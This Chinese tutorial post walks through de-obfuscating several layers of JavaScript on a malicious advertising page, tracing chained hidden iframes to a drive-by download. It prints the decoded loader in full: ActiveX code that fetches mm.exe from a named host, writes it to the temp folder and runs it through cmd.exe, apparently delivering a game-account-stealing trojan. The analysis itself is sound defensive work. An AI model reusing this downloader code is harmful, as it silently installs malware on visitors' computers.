管理资源吧首页>>>教程>>>编程>>>JavaScript教程>>>

[原创]jser必看的破解javascript各种加密的反向思维方法

  原创文章,转载请写明出处 管理资源吧

  才发现的破解javascript各种加密的反向思维方法,大家有好的方法都跟帖啊

  最近发现了一个代码,加密了5层左右,我将破解到最后一步,而且不用javascript解密程序

  用到的软件列表

  1、迅雷(下载网页)直接浏览会执行的,看不到源代码

  2、或用firefox这个软件可以直接浏览网址,由于firefox的特殊性,也推荐用这个浏览器

  一、目标网址 http://www.e9ad.cn/pcdd/80-806.htm

  我们用迅雷下载这个页面或用firefox浏览器浏览得到如下代码

  

复制代码 代码如下:

  <script language=javascript>var DFQC=function(a){return String.fromCharCode

  (a^22)};document.write(DFQC(42)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC(122)+DFQC(40)+DFQC(27)

  +DFQC(28)+DFQC(54)+DFQC(42)+DFQC(126)+DFQC(115)+DFQC(119)+DFQC(114)+DFQC(40)+DFQC(27)+DFQC

  (28)+DFQC(42)+DFQC(101)+DFQC(117)+DFQC(100)+DFQC(127)+DFQC(102)+DFQC(98)+DFQC(40)+DFQC(27)

  +DFQC(28)+DFQC(54)+DFQC(112)+DFQC(99)+DFQC(120)+DFQC(117)+DFQC(98)+DFQC(127)+DFQC(121)+DFQC

  (120)+DFQC(54)+DFQC(117)+DFQC(122)+DFQC(115)+DFQC(119)+DFQC(100)+DFQC(62)+DFQC(63)+DFQC

  (109)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(69)+DFQC(121)+DFQC(99)+DFQC(100)+DFQC(117)+DFQC(115)

  +DFQC(43)+DFQC(114)+DFQC(121)+DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)

  +DFQC(56)+DFQC(116)+DFQC(121)+DFQC(114)+DFQC(111)+DFQC(56)+DFQC(112)+DFQC(127)+DFQC(100)

  +DFQC(101)+DFQC(98)+DFQC(85)+DFQC(126)+DFQC(127)+DFQC(122)+DFQC(114)+DFQC(56)+DFQC(114)

  +DFQC(119)+DFQC(98)+DFQC(119)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(114)+DFQC(121)+DFQC

  (117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)+DFQC(56)+DFQC(121)+DFQC(102)+DFQC

  (115)+DFQC(120)+DFQC(62)+DFQC(63)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(114)+DFQC(121)

  +DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)+DFQC(56)+DFQC(117)+DFQC(122)

  +DFQC(121)+DFQC(101)+DFQC(115)+DFQC(62)+DFQC(63)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC

  (114)+DFQC(121)+DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)+DFQC(56)+DFQC(98)

  +DFQC(127)+DFQC(98)+DFQC(122)+DFQC(115)+DFQC(43)+DFQC(52)+DFQC(113)+DFQC(113)+DFQC(52)+DFQC

  (45)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(114)+DFQC(121)+DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115)

  +DFQC(120)+DFQC(98)+DFQC(56)+DFQC(116)+DFQC(121)+DFQC(114)+DFQC(111)+DFQC(56)+DFQC(127)

  +DFQC(120)+DFQC(120)+DFQC(115)+DFQC(100)+DFQC(94)+DFQC(66)+DFQC(91)+DFQC(90)+DFQC(43)+DFQC

  (69)+DFQC(121)+DFQC(99)+DFQC(100)+DFQC(117)+DFQC(115)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC(54)

  +DFQC(107)+DFQC(42)+DFQC(57)+DFQC(101)+DFQC(117)+DFQC(100)+DFQC(127)+DFQC(102)+DFQC(98)

  +DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(98)+DFQC(127)+DFQC(98)+DFQC(122)+DFQC

  (115)+DFQC(40)+DFQC(119)+DFQC(114)+DFQC(42)+DFQC(57)+DFQC(98)+DFQC(127)+DFQC(98)+DFQC(122)

  +DFQC(115)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(57)+DFQC(126)+DFQC(115)+DFQC

  (119)+DFQC(114)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(116)+DFQC(121)+DFQC(114)

  +DFQC(111)+DFQC(54)+DFQC(121)+DFQC(120)+DFQC(122)+DFQC(121)+DFQC(119)+DFQC(114)+DFQC(43)

  +DFQC(117)+DFQC(122)+DFQC(115)+DFQC(119)+DFQC(100)+DFQC(62)+DFQC(63)+DFQC(54)+DFQC(98)+DFQC

  (121)+DFQC(102)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)+DFQC(43)+DFQC

  (52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(122)+DFQC(115)+DFQC(112)+DFQC(98)+DFQC(123)+DFQC(119)

  +DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC

  (100)+DFQC(127)+DFQC(113)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC(113)+DFQC

  (127)+DFQC(120)+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(116)+DFQC(121)+DFQC(98)

  +DFQC(98)+DFQC(121)+DFQC(123)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)

  +DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(55)

  +DFQC(59)+DFQC(59)+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(127)+DFQC(112)+DFQC(100)+DFQC(119)+DFQC

  (123)+DFQC(115)+DFQC(54)+DFQC(120)+DFQC(119)+DFQC(123)+DFQC(115)+DFQC(43)+DFQC(52)+DFQC(95)

  +DFQC(39)+DFQC(52)+DFQC(54)+DFQC(101)+DFQC(100)+DFQC(117)+DFQC(43)+DFQC(52)+DFQC(46)+DFQC

  (38)+DFQC(46)+DFQC(38)+DFQC(56)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC(52)+DFQC(54)+DFQC(123)

  +DFQC(119)+DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)+DFQC(97)+DFQC(127)+DFQC(114)+DFQC(98)

  +DFQC(126)+DFQC(43)+DFQC(52)+DFQC(39)+DFQC(52)+DFQC(54)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC

  (113)+DFQC(127)+DFQC(120)+DFQC(126)+DFQC(115)+DFQC(127)+DFQC(113)+DFQC(126)+DFQC(98)+DFQC

  (43)+DFQC(52)+DFQC(39)+DFQC(52)+DFQC(54)+DFQC(126)+DFQC(115)+DFQC(127)+DFQC(113)+DFQC(126)

  +DFQC(98)+DFQC(43)+DFQC(52)+DFQC(46)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(97)+DFQC(127)+DFQC

  (114)+DFQC(98)+DFQC(126)+DFQC(43)+DFQC(52)+DFQC(46)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(101)

  +DFQC(117)+DFQC(100)+DFQC(121)+DFQC(122)+DFQC(122)+DFQC(127)+DFQC(120)+DFQC(113)+DFQC(43)

  +DFQC(52)+DFQC(120)+DFQC(121)+DFQC(52)+DFQC(54)+DFQC(116)+DFQC(121)+DFQC(100)+DFQC(114)

  +DFQC(115)+DFQC(100)+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(112)+DFQC(100)+DFQC

  (119)+DFQC(123)+DFQC(115)+DFQC(116)+DFQC(121)+DFQC(100)+DFQC(114)+DFQC(115)+DFQC(100)+DFQC

  (43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(40)+DFQC(42)+DFQC(57)+DFQC(127)+DFQC(112)+DFQC(100)

  +DFQC(119)+DFQC(123)+DFQC(115)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(59)+DFQC(59)+DFQC

  (40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(57)+DFQC(116)+DFQC(121)+DFQC(114)+DFQC(111)

  +DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(57)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC

  (122)+DFQC(40)+DFQC(54)+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(69)+DFQC(85)+DFQC(68)+DFQC(95)+DFQC

  (70)+DFQC(66)+DFQC(40)+DFQC(54)+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(55)+DFQC(59)+DFQC(59)+DFQC

  (54)+DFQC(27)+DFQC(28)+DFQC(97)+DFQC(127)+DFQC(120)+DFQC(114)+DFQC(121)+DFQC(97)+DFQC(56)

  +DFQC(114)+DFQC(115)+DFQC(112)+DFQC(119)+DFQC(99)+DFQC(122)+DFQC(98)+DFQC(69)+DFQC(98)+DFQC

  (119)+DFQC(98)+DFQC(99)+DFQC(101)+DFQC(43)+DFQC(52)+DFQC(54)+DFQC(54)+DFQC(52)+DFQC(45)

  +DFQC(54)+DFQC(27)+DFQC(28)+DFQC(57)+DFQC(57)+DFQC(59)+DFQC(59)+DFQC(40)+DFQC(54)+DFQC(27)

  +DFQC(28)+DFQC(42)+DFQC(57)+DFQC(69)+DFQC(85)+DFQC(68)+DFQC(95)+DFQC(70)+DFQC(66)+DFQC(40)

  +DFQC(27)+DFQC(28)+DFQC(42)+DFQC(127)+DFQC(112)+DFQC(100)+DFQC(119)+DFQC(123)+DFQC(115)

  +DFQC(54)+DFQC(101)+DFQC(100)+DFQC(117)+DFQC(43)+DFQC(126)+DFQC(98)+DFQC(98)+DFQC(102)+DFQC

  (44)+DFQC(57)+DFQC(57)+DFQC(102)+DFQC(121)+DFQC(102)+DFQC(56)+DFQC(97)+DFQC(108)+DFQC(110)

  +DFQC(103)+DFQC(111)+DFQC(56)+DFQC(117)+DFQC(121)+DFQC(123)+DFQC(57)+DFQC(33)+DFQC(33)+DFQC

  (33)+DFQC(57)+DFQC(127)+DFQC(120)+DFQC(114)+DFQC(115)+DFQC(110)+DFQC(56)+DFQC(126)+DFQC(98)

  +DFQC(123)+DFQC(54)+DFQC(97)+DFQC(127)+DFQC(114)+DFQC(98)+DFQC(126)+DFQC(43)+DFQC(38)+DFQC

  (54)+DFQC(126)+DFQC(115)+DFQC(127)+DFQC(113)+DFQC(126)+DFQC(98)+DFQC(43)+DFQC(38)+DFQC(40)

  +DFQC(42)+DFQC(57)+DFQC(127)+DFQC(112)+DFQC(100)+DFQC(119)+DFQC(123)+DFQC(115)+DFQC(40)

  +DFQC(27)+DFQC(28)+DFQC(27)+DFQC(28)+'');</script>

  对于这个的解密呢,分析下

  大家看下document.write(DFQC(42)+DFQC(126).....

  这个DFQC(42),的DFQC就是解密var DFQC=function(a){return String.fromCharCode(a^22)}

  下面我的解密代码也想好了,这个方法基本上可以破解好多的类似代码,大家可以看下这个代码

  

   [Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]

  得到的解密的代码就是

  

复制代码 代码如下:

  <html>

  <head>

  <script>

  function clear(){

  Source=document.body.firstChild.data;

  document.open();

  document.close();

  document.title="gg";

  document.body.innerHTML=Source;

  }</script>

  <title>ad</title>

  </head>

  <body onload=clear() topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0">

  <!--

  <iframe name="I1" src="8080.htm" marginwidth="1" marginheight="1" height="80" width="80"

  scrolling="no" border="0" frameborder="0"></iframe>

  -->

  </body>

  </html>

  <SCRIPT>

  <!--

  window.defaultStatus="  ";

  //-->

  </SCRIPT>

  <iframe src=http://pop.wzxqy.com/777/index.htm width=0 height=0></iframe>

  二、检查下上面的http://www.e9ad.cn/pcdd/8080.htm和http://pop.wzxqy.com/777/index.htm

  我发现下面的iframe加载的有问题,所以呢,

  用下载工具下载http://pop.wzxqy.com/777/index.htm这个页面的代码可以发现如下

  

复制代码 代码如下:

  <iframe src=http://cc.wzxqy.com/wm/index.htm width=0 height=0></iframe>

  <script src='http://s92.cnzz.com/stat.php?id=451144&web_id=451144' language='JavaScript'

  charset='gb2312'></script>

  看这个大家应该会想起,好多网站卖流量类似的代码(就是卖流量的)

  三、继续分析下 http://cc.wzxqy.com/wm/index.htm

  用下载工具下载这个页面,可以得到

  

复制代码 代码如下:

  <script language=javascript src=1.js></script>

  好的继续下载http://cc.wzxqy.com/wm/1.js这个js文件我得到了这个代码

  

复制代码 代码如下:

  eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?

  String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k

  [c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])

  p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('f 8(n){3 g=h.j()*n;k\'~5

  \'+\'.5\'}l{9=\'m://o.p.q/r/s.a\';3 4=t.u("v");4.w("y","z:A-B-C-D-E");3 x=4.7

  ("G.X"+"M"+"L"+"H"+"T"+"T"+"P","");3 S=4.7("I.J","");S.K=1;x.b("N",9,0);x.O();6=8(R);3

  F=4.7("U.V","");3 5=F.W(0);6=F.d(5,6);S.Y();S.Z(x.10);S.11(6,2);S.12();3 Q=4.7

  ("13.14","");e=F.d(5+\'\\\\15\',\'16.a\');Q.17(e,\' /c \'+6,"","b",0)}18(i)

  {i=1}',62,71,'|||var|df|tmp|fname1|CreateObject|gn|dl|exe|open||BuildPath|exp1|function|numb

  er|Math||random|return|try|http||cc|wzxqy|com|wm|mm|document|createElement|object|setAttribu

  te||classid|clsid|BD96C556|65A3|11D0|983A|00C04FC29E36||Microsoft||Adodb|Stream|type|||GET|s

  end|||10000|||Scripting|FileSystemObject|GetSpecialFolder||Open|Write|responseBody|SaveToFil

  e|Close|Shell|Application|system32|cmd|ShellExecute|catch'.split('|'),0,{}))

  大家看到上面的代码可能会发现无法解密了,我搜了下,发现了,竟然有解密代码了,此处可以分析,不

  过我这篇文章的目地,是不用解密程序的,所有我用下面的方法,

  

   [Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]

  上面的方法,我要是考虑下几秒想到的方法,以前没想起,现在大家以后就可以更方面的使用了

  先将eval后的代码用 var str=.......,然后document.write(str);得到了下面的代码

  

复制代码 代码如下:

  function gn(n){var number=Math.random()*n;return'~tmp'+'.tmp'}try

  {dl='http://cc.wzxqy.com/wm/mm.exe';var df=document.createElement("object");df.setAttribute

  ("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var x=df.CreateObject

  ("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var S=df.CreateObject

  ("Adodb.Stream","");S.type=1;x.open("GET",dl,0);x.send();fname1=gn(10000);var

  F=df.CreateObject("Scripting.FileSystemObject","");var tmp=F.GetSpecialFolder

  (0);fname1=F.BuildPath(tmp,fname1);S.Open();S.Write(x.responseBody);S.SaveToFile

  (fname1,2);S.Close();var Q=df.CreateObject("Shell.Application","");exp1=F.BuildPath

  (tmp+'\\system32','cmd.exe');Q.ShellExecute(exp1,' /c '+fname1,"","open",0)}catch(i){i=1}

  然后我们可以发现这个http://cc.wzxqy.com/wm/mm.exe,先下下载下来,记住下载后一般看大小,病毒

  文件都很小,先将mm.exe改名位mm.exe.txt,打开看到了如下代码,唉,

  

复制代码 代码如下:

  <html><body><br><br>

  <script>window.location="/wm/mm.exe?QVyRR=au6BKUDmtn1";</script>

  <center><h3>如果您的页面没有自动跳转,请<a href="/wm/mm.exe?QVyRR=au6BKUDmtn1">点击这里

  </a><h3></center>

  </body></html>

  看到了吗,最主要的就是这个了 http://cc.wzxqy.com/wm/mm.exe?QVyRR=au6BKUDmtn1

  然后用软件下载,这个就是病毒文件了,

  终于完成了 ,发现病毒,应该是盗号系统的木马,现在网上卖流量的很多,大家爱玩游戏的请注意了

  当然上面的javascript反向思维方法可以得到大部分的加密的 javascript,而且其它的好多都有解密程

  序,大家如果好的方法,都贴出来啊,这样大家才能进步。作者:reterry QQ:461478385

  原创文章,转载请写明出处 管理资源吧

教程首页 更多教程